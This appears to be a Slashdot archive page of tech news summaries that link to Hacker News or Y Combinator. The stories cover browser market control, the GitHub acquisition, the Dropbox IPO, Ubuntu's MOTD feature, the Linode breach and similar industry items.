Domain: ycombinator.com
Stories and comments across the archive that link to ycombinator.com.
Stories · 64
-
'Google Isn't the Company That We Should Have Handed the Web Over To' (arstechnica.com)
Iwastheone shares a report from Ars Technica's Peter Bright: With Microsoft's decision to end development of its own Web rendering engine and switch to Chromium, control over the Web has functionally been ceded to Google. That's a worrying turn of events, given the company's past behavior. Chrome itself has about 72 percent of the desktop-browser market share. Edge has about 4 percent. Opera, based on Chromium, has another 2 percent. The abandoned, no-longer-updated Internet Explorer has 5 percent, and Safari -- only available on macOS -- about 5 percent. When Microsoft's transition is complete, we're looking at a world where Chrome and Chrome-derivatives take about 80 percent of the market, with only Firefox, at 9 percent, actively maintained and available cross-platform.
The mobile story has stronger representation from Safari, thanks to the iPhone, but overall tells a similar story. Chrome has 53 percent directly, plus another 6 percent from Samsung Internet, another 5 percent from Opera, and another 2 percent from Android browser. Safari has about 22 percent, with the Chinese UC Browser sitting at about 9 percent. That's two-thirds of the mobile market going to Chrome and Chrome derivatives. In terms of raw percentages, Google won't have quite as big a lock on the browser space as Microsoft did with Internet Explorer -- Internet Explorer 6 peaked at around 80 percent, and all versions of Internet Explorer together may have reached as high as 95 percent. But Google's reach is, in practice, much greater: not only is the Web a substantially more important place today than it was in the early 2000s, but also there's a whole new mobile Web that operates in addition to the desktop Web. Google has deployed proprietary technology and left the rest of the industry playing catch-up, writes Peter. The company has "tried to push the Web into a Google-controlled proprietary direction to improve the performance of Google's online services when used in conjunction with Google's browser, consolidating Google's market positioning and putting everyone else at a disadvantage."
YouTube has been a particular source of problems. One example Peter provides has to do with a hidden, empty HTML element that was added to each YouTube video to disable Edge's hardware accelerated video decoding: "For no obvious reason, Google changed YouTube to add a hidden, empty HTML element that overlaid each video. This element disabled Edge's fastest, most efficient hardware accelerated video decoding. It hurt Edge's battery-life performance and took it below Chrome's. The change didn't improve Chrome's performance and didn't appear to serve any real purpose; it just hurt Edge, allowing Google to claim that Chrome's battery life was actually superior to Edge's. Microsoft asked Google if the company could remove the element, to no avail." -
Former Edge Browser Intern Alleges Google Sabotaged Microsoft's Browser (ycombinator.com)
Joshua Bakita, a former software engineering intern on the Edge team at Microsoft, says one of the reasons Microsoft had to ditch the EdgeHTML rendering engine in the Edge browser and switch to Chromium was to keep up with the changes (some of which were notorious) that Google pushed to its sites. These changes were designed to ensure that Edge and other browsers could not properly run Google's sites, he alleged. Responding to a comment, he wrote: "For example, they may start integrating technologies for which they have exclusive, or at least 'special' access. Can you imagine if all of a sudden Google apps start performing better than anyone else's?" This is already happening. I very recently worked on the Edge team, and one of the reasons we decided to end EdgeHTML was because Google kept making changes to its sites that broke other browsers, and we couldn't keep up.
For example, they recently added a hidden empty div over YouTube videos that causes our hardware acceleration fast-path to bail (should now be fixed in Win10 Oct update). Prior to that, our fairly state-of-the-art video acceleration put us well ahead of Chrome on video playback time on battery, but almost the instant they broke things on YouTube, they started advertising Chrome's dominance over Edge on video-watching battery life. What makes it so sad is that their claimed dominance was not due to ingenious optimization work by Chrome, but due to a failure of YouTube. On the whole, they only made the web slower.
Now while I'm not sure I'm convinced that YouTube was changed intentionally to slow Edge, many of my co-workers are quite convinced -- and they're the ones who looked into it personally. To add to this all, when we asked, YouTube turned down our request to remove the hidden empty div and did not elaborate further. And this is only one case. -
Company Takes Over Well-Known OSS Developer's Name Because the Domain Was Free
New submitter Fatalis writes: Substack is a venture capital funded startup for subscription-based newsletters, and it admittedly chose its name following the advice from a Paul Graham (co-founder of Y Combinator) article to prefer names not registered in the .com zone. The same name has also been the user handle for a prolific open-source developer who now finds themselves competing for recognition in the tech space with a capital backed company. The lesson seems to be for developers to protect their personal brand by registering a domain name with the .com extension due to it being perceived as the default. -
Microsoft's Interest In Buying GitHub Draws Backlash From Developers
The rumored acquisition of popular code repository GitHub by Microsoft has drawn an unprecedented backlash from the developer community. Over the weekend, after Bloomberg reported that the two companies could make the announcement as soon as Monday, hundreds of developers took to forums and social media to express their disappointment, with many saying that they would be leaving the platform if the deal goes through.
So why so much outrage? In a conversation with Slashdot, software developer and student Sean said that he believes a deal of such capacity would be bad for the open source community. "They've shown time and time again that they can't be trusted," he said. Sean and many others believe that Microsoft would eventually start a telemetry program on the code repository. "Aside from Microsoft not being trustworthy to the open source community, I'm sure they'll add tracking and possibly even ads to all the sites within GitHub. As well as possibly use it to push LinkedIn (which they own)," he said. Ryan Hoover, the founder of ProductHunt, wrote on Sunday, "Anecdotally, the developer community is very unapproving of this move. I'm curious how Microsoft manages this and how GitHub changes (or doesn't change)." Even as Microsoft has "embraced" the open source community in recent years (under the leadership of Mr. Nadella), for many developers, it will take time -- if it happens at all -- to forget the company's past closed-ecosystem approach. Just this weekend, a developer accused Microsoft of stealing his code.
A petition that seeks to "stop Microsoft from buying Github" had garnered support from more than 400 developers. Prominent developer Andre Staltz said, "If you're still optimistic about the Microsoft-GitHub acquisition, consider this: They didn't ask your opinion not even a single bit, even though it was primarily your commits, stars, and repositories which made GH become a valuable platform." More importantly, if the comments left on Slashdot, Reddit, and HackerNews, places that overwhelmingly count developers and other IT industry experts among their audience, are anything to go by, Microsoft had better have a good plan for how it intends to operate GitHub after the buyout. Security reporter Catalin Cimpanu said, "LinkedIn has turned into a slow-loading junk after the Microsoft acquisition. I can only imagine what awaits GitHub." For his part, Mat Velloso, who is technical advisor to the CTO at Microsoft, said, "I don't think people understand how many of us at Microsoft love GitHub to the bottom of our hearts. If anybody decided to mess with that community, there would be a riot to say the least."
Jacques Mattheij: Companies that are too big to fail and that lose money are a dangerous combination. People have warned about GitHub becoming as large as it did as problematic because it concentrates too much of the power to make or break the open source world in a single entity, more so because there were valid questions about GitHub's financial viability. The model that GitHub has -- sell their services to closed source companies but provide the service for free for open source groups -- is only a good one if the closed source companies bring in enough funds to sustain the model. Some sort of solution should have been found -- preferably in collaboration with the community -- not an 'exit' to one of the biggest sharks in the tank. So, here is what is wrong with this deal and why anybody active in the open source community should be upset that Microsoft is going to be the steward of this large body of code. For starters, Microsoft has a very long history of abusing its position vis-a-vis open source and other companies. I'm sure you'll be able to tell I'm a cranky old guy by looking up the dates to some of these references, but 'new boss, same as the old boss' applies as far as I'm concerned. Yes, the new boss is a nicer guy but it's the same corporate entity. Update: It's official. Microsoft has acquired GitHub for a whopping sum of $7.5B. -
Dropbox IPOs. Its Founders Are Now Billionaires (cnbc.com)
Yesterday Dropbox finally launched its stock on NASDAQ. Reuters reports: Dropbox Inc's shares closed at $28.42, up more than 35 percent in their first day of trading on Friday, as investors rushed to buy into the biggest technology initial public offering in more than a year even as the wider sector languished... At the stock's opening price, Dropbox had a market valuation of $12.67 billion, well above the $10 billion valuation it had in its last private funding round... It has yet to turn a profit, which is common for startups that invest heavily in growth. As a public company Dropbox will be under pressure to quickly trim its losses. The 11-year old company reported revenue of $1.11 billion in 2017, up from $844.8 million a year earlier. Its net loss nearly halved from $210.2 million in 2016.
CNBC reports that Y Combinator almost passed on a chance to invest in Dropbox -- which became its first IPO ever -- "because it had misgivings about bringing on a solo entrepreneur." After Drew Houston, the creator of Dropbox, scrambled to find a co-founder in time for his in-person interview, the company was admitted into YC in 2007. Four years later, venture capitalists poured money into Dropbox at a $4 billion valuation. YC has since become a power player in Silicon Valley, helping spawn numerous companies valued at over $1 billion today including Stripe, Airbnb, Instacart and Coinbase. It also backed Twitch, which Amazon acquired in 2014 for about $970 million, and the self-driving tech start-up Cruise, which GM bought in 2016 for over $1 billion. But in its 13-year history, YC had yet to see any of its companies go public until Dropbox's stock market debut on Friday...
Houston is now worth over $3 billion and co-founder Arash Ferdowsi owns shares valued at more than $1 billion.
Dropbox's Twitter feed posted a video from their NASDAQ debut, adding "We're so thankful for the 500 million registered users who helped us get here." -
Browser Extensions Are Undermining Privacy (vortex.com)
pizzutz writes: Chrome's popular Web Developer plugin was briefly hijacked on Wednesday when an attacker gained control of the author's Google account and released a new version (0.49) which injected ads into web pages of more than a million users who downloaded the update. The version was quickly replaced with an uncompromised version (0.5) and all users are urged to update immediately.
Lauren Weinstein has a broader warning: While the browser firms work extensively to build top-notch security and privacy controls into the browsers themselves, the unfortunate fact is that these can be undermined by add-ons, some of which are downright crooked, many more of which are sloppily written and poorly maintained. Ironically, some of these add-on extensions and apps claim to be providing more security, while actually undermining the intrinsic security of the browsers themselves. Others (and this is an extremely common scenario) claim to be providing additional search or shopping functionalities, while actually only existing to silently collect and sell user browsing activity data of all sorts.
Lauren also warns about sites that "push users very hard to install these privacy-invasive, data sucking extensions" -- and believes requests for permissions aren't a sufficient safeguard for most users. "Expecting them to really understand what these permissions mean is ludicrous. We're the software engineers and computer scientists -- most users aren't either of these. They have busy lives -- they expect our stuff to just work, and not to screw them over." -
Are App Sizes Out of Control?
In a blog post, Trevor Elkins points out the large sizes of common apps like LinkedIn and Facebook. "I went to update all my apps the other day when something caught my eye... since when does LinkedIn take up 275MB of space?!" Elkins wrote. "In fact, the six apps in this picture average roughly 230MB in size, 1387MB in total. That would take an 8Mbit internet connection 24 minutes to download, and I'd still be left with 27 additional apps to update! More and more companies are adopting shorter release cycles (two weeks or so) and it's becoming unsustainable as a consumer to update frequently."
Should Apple do something to solve this "systematic" problem? Elkins writes, "how does an app that occasionally sends me a connection request and recruiter spam take up 275MB?"
Further discussion via Hacker News. -
Ask Slashdot: Ubuntu 18.04 LTS Desktop Default Application Survey
Dustin Kirkland, Ubuntu Product and Strategy at Canonical, writes: Howdy all- Back in March, we asked the HackerNews community, "What do you want to see in Ubuntu 17.10?": https://ubu.one/AskHN. A passionate discussion ensued, the results of which are distilled into this post: http://ubu.one/thankHN. In fact, you can check that link, http://bit.ly/thankHN and see our progress so far this cycle. We already have a beta code in 17.10 available for your testing for several of those:
- GNOME replaced Unity
- Bluetooth improvements with a new BlueZ
- Switched to libinput
- 4K/Multimonitor/HiDPI improvements
- Upgraded to Network Manager 1.8
- New Subiquity server installer
- Minimal images (36MB, 18% smaller)
And several others have excellent work in progress, and will be complete by 17.10:
- Autoremove old kernels from /boot
- EXT4 encryption with fscrypt
- Better GPU/CUDA support
In summary -- your feedback matters! There are hundreds of engineers and designers working for *you* to continue making Ubuntu amazing! Along with the switch from Unity to GNOME, we're also reviewing some of the desktop applications we package and ship in Ubuntu. We're looking to crowdsource input on your favorite Linux applications across a broad set of classic desktop functionality. We invite you to contribute by listing the applications you find most useful in Linux in order of preference.
Click through for info on how to contribute. To help us parse your input, please copy and paste the following bullets with your preferred apps in Linux desktop environments. You're welcome to suggest multiple apps, please just order them prioritized (e.g. Web Browser: Firefox, Chrome, Chromium). If some of your functionality has moved entirely to the web, please note that too (e.g. Email Client: Gmail web, Office Suite: Office360 web). If the software isn't free/open source, please note that (e.g. Music Player: Spotify client non-free). If I've missed a category, please add it in the same format. If your favorites aren't packaged for Ubuntu yet, please let us know, as we're creating hundreds of new snap packages for Ubuntu desktop applications, and we're keen to learn what key snaps we're missing.
- Web Browser: ???
- Email Client: ???
- Terminal: ???
- IDE: ???
- File manager: ???
- Basic Text Editor: ???
- IRC/Messaging Client: ???
- PDF Reader: ???
- Office Suite: ???
- Calendar: ???
- Video Player: ???
- Music Player: ???
- Photo Viewer: ???
- Screen recording: ???
In the interest of opening this survey as widely as possible, we've cross-posted this thread to HackerNews, Reddit, and Slashdot. We very much look forward to another friendly, energetic, collaborative discussion. Thank you! @DustinKirkland On behalf of @Canonical and @Ubuntu
-
Ubuntu Disputes 'Ads In MOTD' Claims (twitter.com)
Thursday Lproven (Slashdot reader #6030) wrote: It appears that Ubuntu is using a feature it has added -- intended to insert headlines of breaking tech news (security alerts and so on) into the Message of the Day displayed at login to the console -- to display advertising and promotional messages.
The message in question linked to a Hacker Noon article titled "How HBO's Silicon Valley built 'Not Hotdog' with mobile TensorFlow, Keras & React Native." Later that day Dustin Kirkland, a Ubuntu Product Manager for the feature's design (and the Core Developer for its implementation) suggested the message had been mistaken for an ad, describing it on Hacker News as a "fun fact... an interesting tidbit of potpourri from the world of Ubuntu," and later saying it was intended like Google's doodles. "Last week's message actually announced an Ubuntu conference in Latin America. The week before, we linked to an article asking for feedback on Kubuntu. Before that, we announced the availability of Extended Security Maintenance updates for 12.04. And so on." He later confirmed Canonical received no money for the message, and also pointed out that the messages all come from an open source repository, and "You're welcome to propose your own messages for merging, if you have a well formatted, informative message for Ubuntu users."
Click through for a condensed version of the complete response by Dustin Kirkland, Ubuntu Product and Strategy at Canonical.
Kirkland describes the design of the feature as follows:
- Asynchronously, about 60 seconds after boot, a systemd timer fires which runs "/etc/update-motd.d/50-motd-news --force"
- It sources 3 admin-editable config variables in /etc/default/motd-news. The defaults are: ENABLED=1, URLS="https://motd.ubuntu.com", WAIT="5"
- The admin can disable it entirely (ENABLED=0), change or add other MOTD news sources (your corporate IT team could run its own), and change the wait time in seconds
- If it's enabled, that systemd timer job will loop over each of the URLS (note that it's important that these should be https with valid SSL certificates), trim them to 80 characters per line, and a maximum of 10 lines, and concatenate them to a cache file in /var/cache/motd-news
- Every ~12 hours thereafter (with a little bit of random timer fuzzing), this systemd timer job will re-run and update the /var/cache/motd-news
- Upon login, the contents of /var/cache/motd-news is just printed to screen.
Kirkland notes the message can be customized by local IT administrators, or used to deliver warnings about serious vulnerabilities like Shellshock or Heartbleed. And he also describes the dynamic motd as a Ubuntu feature since adopted by other distros (including Debian) as "a flexible framework that enables distro packages or administrators to add executable scripts in /etc/update-motd.d/* to generate informative, interesting messages displayed at login... for almost 40 years of Linux/UNIX, the 'Message of the Day' was anything but that... It was a message that was created at one point in time, when the distro released, and that's about it. And we managed to change that."
-
Google Was Warned About This Week's Mass Phishing Email Attack Six Years Ago (vice.com)
An anonymous reader quotes a report from Motherboard: For almost six years, Google knew about the exact technique that someone used to trick around one million people into giving away access to their Google accounts to hackers on Wednesday. Even more worrisome: other hackers might have known about this technique as well. On October 4, 2011, a researcher speculated in a mailing list that hackers could trick users into giving them access to their accounts by simply posing as a trustworthy app. This attack, the researcher argued in the message, hinges on creating a malicious application and registering it on the OAuth service under a name like "Google," exploiting the trust that users have in the OAuth authorization process. OAuth is a standard that allows users to grant websites or applications access to their online email and social networking accounts, or parts of their accounts, without giving up their passwords. "Imagine someone registers a client application with an OAuth service, let's call it Foobar, and he names his client app 'Google, Inc.'. The Foobar authorization server will engage the user with 'Google, Inc. is requesting permission to do the following,'" Andre DeMarre wrote in the message sent to the Internet Engineering Task Force (IETF), the independent organization responsible for many of the internet's operating standards. "The resource owner might reason, 'I see that I'm legitimately on the https://www.foobar.com/ site, and Foobar is telling me that Google wants permission. I trust Foobar and Google, so I'll click Allow,'" DeMarre concluded. As it turns out, DeMarre claims he warned Google directly about this vulnerability in 2012, and suggested that Google address it by checking to ensure the name of any given app matched the URL of the company behind it. In a Hacker News post, DeMarre said he reported this attack vector back then, and got a "modest bounty" for it. -
Debian Developer Imprisoned In Russia Over Alleged Role In Riots (itwire.com)
An anonymous reader writes: "Dmitry Bogatov, Debian developer and Tor node admin, is still being held in a Moscow jail," tweeted the EFF Saturday. IT Wire reports that the 25-year-old math teacher was arrested earlier this month "on suspicion of organizing riots," and is expected to be held in custody until June 8. "The panel investigating the protests claims Bogatov posted several incitory messages on the sysadmin.ru forum; for example, one claim said he was asking people to bring 'bottles, fabric, gasoline, turpentine, foam plastic' to Red Square, according to a post at Hacker News. The messages were sent in the name of one Airat Bashirov and happened to be transmitted through the Tor node that Bogatov was running. The Hacker News post said Bogatov's lawyer had produced surveillance video footage to show that he was elsewhere at the time when the messages were posted.
"After Dmitry's arrest," reports the Free Bogatov site, "Airat Bashirov continued to post messages. News outlets 'Open Russia' and 'Mediazona' even got a chance to speak with him."
Earlier this month the Debian GNU/Linux project also posted a message of support, noting Dmitry maintains several packages for command line and system tools, and saying their group "honours his good work and strong dedication to Debian and Free Software... we hope he is back as soon as possible to his endeavours... In the meantime, the Debian Project has taken measures to secure its systems by removing Dmitry's keys in the case that they are compromised." -
Ask Slashdot: How Should You Launch A Software Startup? (theguardian.com)
Slashdot reader ben-hnb is a developer who loves the idea of running a startup, or being one of the ones who got in early. But how exactly does he get there? I've got no "business" experience. Everyone seems to want to get on the startup incubator train -- the latest U.K. model I've seen, Launchpad, would even train (MA!) and support me financially for a year while developing the initial product. This is just one in a long list of different models, from the famous Y-Combinator three-month model to the 500 Startups four-month seed program and simple co-working spaces with a bit of help, like Launch 22.
If you wanted to get a startup going, where would you go to first and why? Or would you just strike out in your bedroom/garage?
Leave your best answers in the comments. How would you launch a software startup? -
Server Snafu Exposes Ask.com User Search Queries Via Internal Status Page (bleepingcomputer.com)
"The Ask.com search engine went through some sort of technical issue late Friday night, as its servers were exposing the internal Apache server status page, revealing recently processed search queries," reports BleepingComputer. An anonymous reader writes: The issue is now fixed, but a copy of the server status page with some search queries can still be viewed in Google's search engine cache. "Some of the weirdest search queries were collected by users in a Hacker News thread," reports BleepingComputer, adding "As you'd expect, the server page included plenty of searches for porn."
The issue also affected localized Ask.com servers, such as uk.ask.com/server-status, us.ask.com/server-status, and de.ask.com/server-status, but no user data was exposed, as the search queries passed through load balancers and already hid user IPs. -
Scientists Sent a Rocket To Mars For Less Than It Cost To Make 'The Martian' (backchannel.com)
Ipsita Agarwal via Backchannel retells the story of how India's underfunded space organization, ISRO, managed to send a rocket to Mars for less than it cost to make the movie "The Martian," starring Matt Damon as Mark Watney. "While NASA's Mars probe, Maven, cost $651 million, the budget for this mission was $74 million," Agarwal writes. In what appears to be India's version of "Hidden Figures" (a movie that also cost more to make than ISRO's budget for the Mars rocket), the team of scientists behind the rocket launch consisted of Indian women, who not only managed to pull off the mission successfully but did so in only 18 months. Backchannel reports: A few months and several million kilometers later, the orbiter prepared to enter Mars' gravity. This was a critical moment. If the orbiter entered Mars' gravity at the wrong angle, off by so much as one degree, it would either crash onto the surface of Mars or fly right past it, lost in the emptiness of space. Back on Earth, its team of scientists and engineers waited for a signal from the orbiter. Mission designer Ritu Karidhal had worked 48 hours straight, fueled by anticipation. As a child, Minal Rohit had watched space missions on TV. Now, Minal waited for news on the orbiter she and her colleague, Moumita Dutta, had helped engineer. When the signal finally arrived, the mission control room broke into cheers. If you work in such a room, deputy operations director, Nandini Harinath, says, "you no longer need to watch a thriller movie to feel the thrill in life. You feel it in your day-to-day work." This was not the only success of the mission. An image of the scientists celebrating in the mission control room went viral. Girls in India and beyond gained new heroes: the kind that wear sarees and tie flowers in their hair, and send rockets into space. 
User shas3 notes in a comment on the Hacker News post: "If you are interested in Indian women scientists and engineers, there is a nice compilation (a bit tiresome to read, but worth it, IMO) of biographical essays called 'Lilavati's Daughters.'" -
Commentary On How To Make Novice Programmers More Professional (slashdot.org)
Over the weekend, my colleague David ran a story that sought people's suggestions on how to make (force, encourage, advise) a novice programmer to be more professional. Several people have shared insightful comments on the topic. One such comment, which has received unusual support not just on Slashdot but elsewhere, is from William Woody, owner of Glenview Software (who has previously worked as CTO at Cartifact and as an architect at AT&T Interactive). He writes: The problem is that our industry, unlike every other single industry except acting and modeling (and note neither is known for "intelligence"), worships at the altar of youth. I don't know the number of people I've encountered who tell me that by being older, my experience is worthless since all the stuff I've learned has become obsolete. This, despite the fact that the dominant operating systems used in most systems are based on an operating system that is nearly 50 years old, the "new" features being added to many "modern" languages are really concepts from languages that are between 50 and 60 years old or older, and most of the concepts we bandy about as cutting edge were developed from 20 to 50 years ago. It also doesn't help that the youth whose accomplishments we worship usually get concepts wrong. I don't know the number of times I've seen someone claim code was refactored along some new-fangled "improvement" over an "outdated" design pattern who wrote objects that bear no resemblance to the pattern they claim to be following. And when I indicate that the "massive view controller" problem often represents a misunderstanding as to what constitutes a model and what constitutes a view, I'm told that I have no idea what I'm talking about -- despite having more experience than the critic has been alive, and despite graduating from Caltech (meaning I'm probably not a complete idiot). Our industry is rife with arrogance, and often the arrogance of the young and inexperienced.
Our industry seems to value "cowboys" despite doing everything it can (with the management technique "flavor of the month") to stop "cowboys." Our industry is ageist, sexist, one where the blind lead the blind, and seminal works attempting to understand the problem of development go ignored. You can read the full comment here or here. -
'Fundraising Rounds Are Not Milestones' (ycombinator.com)
Michael Seibel, a partner at Y Combinator, writes in a blog post: I'd like to make the point that success isn't the same as raising a round of financing. Quite the opposite: raising a round should be a byproduct of success. Using fundraising itself as a benchmark is dangerous for the entire community because it encourages a culture of optimizing for short term showmanship instead of making something people want and creating lasting value. I believe founders, investors, and the tech press should fundamentally change how they think about fundraising. By deemphasizing investment rounds we would have more opportunity to celebrate companies who develop measurable milestones of value creation, focus on serving a customer with a real need, and generate sustainable businesses with good margins. -
Google Quietly Makes 'Optional' Web DRM Mandatory In Chrome (boingboing.net)
JustAnotherOldGuy quotes a report from Boing Boing: The World Wide Web Consortium's Encrypted Media Extensions (EME) is a DRM system for web video, being pushed by Netflix, movie studios, and a few broadcasters. It's been hugely controversial within the W3C and outside of it, but one argument that DRM defenders have made throughout the debate is that the DRM is optional, and if you don't like it, you don't have to use it. That's not true any more. Some time in the past few days, Google quietly updated Chrome (and derivative browsers like Chromium) so that Widevine (Google's version of EME) can no longer be disabled; it comes switched on and installed in every Chrome instance. Because of laws like section 1201 of the U.S. Digital Millennium Copyright Act (and Canada's Bill C11, and EU implementations of Article 6 of the EUCD), browsers that have DRM in them are risky for security researchers to audit. These laws provide both criminal and civil penalties for those who tamper with DRM, even for legal, legitimate purposes, and courts and companies have interpreted this to mean that companies can punish security researchers who reveal defects in their products. Further reading: Boing Boing and Hacker News. -
Dropbox Kills Public Folders, Users Rebel (ndtv.com)
New submitter rkagerer writes: Dropbox unleashed a tidal wave of user backlash yesterday when it announced plans to eradicate its Public folder feature in 2017. Criticism from users whose links will break surfaced on Reddit, HackerNews and its own forums. Overnight, customers up-voted a feature request to reverse the decision, skyrocketing it to a "Top 10" position on the company's tracker. joemck explains: "There are countless users who have been using the public folder to post images and files in blogs and forums. These aren't just worthless jokes and memes that nobody will miss if you flip the switch and break all of them. These are often valuable resources that users have created and entrusted to you to retain and keep online." One user even created a comic strip for the occasion, with another concerned the URL he registered with the Coast Guard containing potentially lifesaving information will go dark. Although the feature was deprecated in 2012, it remained in place for existing users. The company provides an alternative sharing method, but some users claim it's not as convenient and doesn't provide direct links. According to the announcement, free accounts have until March 15 to update their links, while the lights will go out for paid accounts on September 1. UPDATE 12/17/16: Slashdot reader rkagerer notes, "Dropbox quietly killed the feature request after this story hit the front page, but the original content can still be found interleaved in the forum discussion." -
Spotify Is Writing Massive Amounts of Junk Data To Storage Drives (arstechnica.com)
An anonymous reader quotes a report from Ars Technica: For almost five months -- possibly longer -- the Spotify music streaming app has been assaulting users' storage devices with enough data to potentially take years off their expected lifespans. Reports of tens or in some cases hundreds of gigabytes being written in an hour aren't uncommon, and occasionally the recorded amounts are measured in terabytes. The overload happens even when Spotify is idle and isn't storing any songs locally. The behavior poses an unnecessary burden on users' storage devices, particularly solid state drives, which come with a finite amount of write capacity. Continuously writing hundreds of gigabytes of needless data to a drive every day for months or years on end has the potential to cause an SSD to die years earlier than it otherwise would. And yet, Spotify apps for Windows, Mac, and Linux have engaged in this data assault since at least the middle of June, when multiple users reported the problem in the company's official support forum. Three Ars reporters who ran Spotify on Macs and PCs had no trouble reproducing the problem reported not only in the above-mentioned Spotify forum but also on Reddit, Hacker News, and elsewhere. Typically, the app wrote from 5 to 10 GB of data in less than an hour on Ars reporters' machines, even when the app was idle. Leaving Spotify running for periods longer than a day resulted in amounts as high as 700 GB. According to comments left in the Spotify forum in the past 24 hours, the bug has been fixed in version 1.0.42, which is in the process of being rolled out. -
Mark Zuckerberg Defends Peter Thiel's Trump Ties In Internal Memo (theverge.com)
Soon after it was announced that Project Include, a community for building meaningful, enduring diversity and inclusion into tech companies, would no longer work with Y Combinator startups, Facebook CEO Mark Zuckerberg defended Thiel's status as a Facebook board member in a message to employees. "We can't create a culture that says it cares about diversity and then excludes almost half the country because they back a political candidate," Zuckerberg wrote. "There are many reasons a person might support Trump that do not involve racism, sexism, xenophobia, or accepting sexual assault." The Verge reports: A screenshot of the memo was posted to Hacker News yesterday, and it later surfaced on Boing Boing. A Facebook spokesman confirmed the authenticity of the five-paragraph memo to The Verge. It appears to have been posted on Facebook for Work, the enterprise version of Facebook that the company recently made available to other companies. Thiel's endorsement of Trump has put those CEOs in a difficult position. On one hand he is a close adviser; on the other, his support for an erratic, racist demagogue has outraged many of their employees and partners. Like Y Combinator's Sam Altman before him, Zuckerberg defended the company's ties to Thiel by saying that the company has a moral obligation to consider a variety of viewpoints, no matter how abhorrent. "We care deeply about diversity," Zuckerberg wrote. "That's easy to do when it means standing up for ideas you agree with. It's a lot harder when it means standing up for the rights of people with different viewpoints to say what they care about. That's even more important." Of course, as the designer Jason Putorti wrote on Medium this week, Thiel already has an outsized capacity to stand up for ideas he agrees with: he spent $1.25 million to promote them. Zuckerberg's memo reads as if he is defending Thiel's right to post on Facebook. 
In fact, the question is whether someone who promotes opposition to gender and racial equality should be allowed to serve as a steward for a company whose stated mission is to connect the world. -
Project Include Drops Y Combinator As Peter Thiel Pledges $1.25 Million To Trump (theverge.com)
Peter Thiel's support for U.S. Republican presidential candidate Donald Trump has given Silicon Valley a headache. This past weekend, Thiel donated $1.25 million to his campaign, which is driving away partners from Thiel's Silicon Valley accelerator, Y Combinator. Today, Project Include, a community for building meaningful, enduring diversity and inclusion into tech companies, said that it would no longer work with Y Combinator startups. "Thiel's actions are in direct conflict with our values at Project Include," the group's co-founder, Ellen Pao, wrote in a Medium post. "Because of this continued connection to YC, we are compelled to break off our relationship with YC." The Verge reports: Founded in 2005, Y Combinator has incubated some of the biggest tech companies of the past decade, including Airbnb, Dropbox, and Stripe. It faced a barrage of criticism over the weekend for refusing to dissociate itself from Thiel, who took an advisory role with the organization in 2015. In a series of tweets, YC's president stood by Thiel. "Cutting off opposing viewpoints leads to extremism and will not get us the country we want," Sam Altman wrote. "Diversity of opinion is painful but critical to the health of a democratic society. We can't start purging people for political support." In her post, Pao rejected the idea that Thiel's donation could be dismissed as political speech. "We agree that people shouldn't be fired for their political views, but this isn't a disagreement on tax policy, this is advocating hatred and violence," she wrote. "Giving more power to someone whose ascension and behavior strike fear into so many people is unacceptable. His attacks on black, Mexican, Asian, Muslim, and Jewish people, on women, and on others are more than just political speech; fueled by hate and encouraging violence, they make each of us feel unsafe." -
Google Working On New 'Fuchsia' OS (digitaltrends.com)
An anonymous reader writes: Google is working on a new operating system dubbed Fuchsia OS for smartphones, computers, and various other devices. The new operating system was spotted in the Git repository, where the description reads: "Pink + Purple == Fuchsia (a new Operating System)." Hacker News reports that Travis Geiselbrecht, who worked on NewOS, BeOS, Danger, Palm's webOS and iOS, and Brian Swetland, who also worked on BeOS and Android, will be involved in this project. The Magenta and LK kernels will be powering the operating system. "LK is a kernel designed for small systems typically used in embedded applications," reads the repository. "On the other hand, Magenta targets modern phones and modern personal computers with fast processors, non-trivial amounts of RAM with arbitrary peripherals doing open-ended computation." It's too early to tell exactly what this OS is meant for. Whether it's for an Android and Chrome OS merger or something completely new, it's exciting nonetheless. -
Israeli 10th-Grader Discovers Elegant Geometry Theorem
An anonymous reader writes with a report that: Tamar Barbi, a 10th grade student living in Hod Hasharon, Israel, discovered that the theorem she was using to solve one of the problems on her geometry homework didn't actually exist. With the help of her teacher and mathematicians, she wrote up a proof for the theorem, which helps provide new and more elegant proofs for many other mathematical theorems. Posters at Hacker News have some skeptical words about the theorem's novelty, but also about the phrasing of the news report, which seems to omit some crucial words. -
Multimedia Powerhouse FFmpeg Hits 3.0
An anonymous reader writes: The milestone release FFmpeg 3.0 "Einstein" has been unleashed. For those who need a reminder, FFmpeg comprises several libraries and command-line tools (the main command-line tool being "ffmpeg") that encode, decode, transcode, and stream audio/visual data, etc. FFmpeg supports a multitude of codecs, filters, and container formats too numerous to mention here. FFmpeg is used by MPlayer, VLC, HandBrake, Chrome, and many other projects. Changes from 2.x to 3.0 include: a much better native AAC encoder, better hardware acceleration, and some API/ABI breakage. See this, this, this, this, and the changelog for much better descriptions of the improvements. -
Linode Resets Passwords After Credentials Leak (linode.com)
New submitter qmrq sends news that Linode, a major provider of virtual private servers, has been compromised again. In a blog post, they said, "A security investigation into the unauthorized login of three accounts has led us to the discovery of two Linode.com user credentials on an external machine. This implies user credentials could have been read from our database, either offline or on, at some point. The user table contains usernames, email addresses, securely hashed passwords and encrypted two-factor seeds." The Linode team said it found evidence of unauthorized access to three customer accounts. They don't yet know who is behind the attacks.
An employee for PagerDuty said they were compromised through Linode Manager all the way back in July. "In our situation the attacker knew one of our user's passwords and MFA secret. This allowed them to provide valid authentication credentials for an account in the Linode Manager. It's worth noting that all of our active user accounts had two-factor authentication enabled. ... We also have evidence from access logs provided by Linode that the attackers tried to authenticate as an ex-employee, whose username ONLY existed in the Linode database." -
Google Confirms Next Android Version Won't Use Oracle's Proprietary Java APIs
An anonymous reader writes: Google is ditching the Java application programming interfaces (APIs) in Android and moving to only OpenJDK. The news first came by a "mysterious Android codebase commit" from last month submitted to Hacker News. Google confirmed to VentureBeat that Android N will rely solely on OpenJDK. “As an open-source platform, Android is built upon the collaboration of the open-source community,” a Google spokesperson told VentureBeat. “In our upcoming release of Android, we plan to move Android’s Java language libraries to an OpenJDK-based approach, creating a common code base for developers to build apps and services. Google has long worked with and contributed to the OpenJDK community, and we look forward to making even more contributions to the OpenJDK project in the future.” -
Google May Try To Recruit You For a Job Based On Your Search Queries
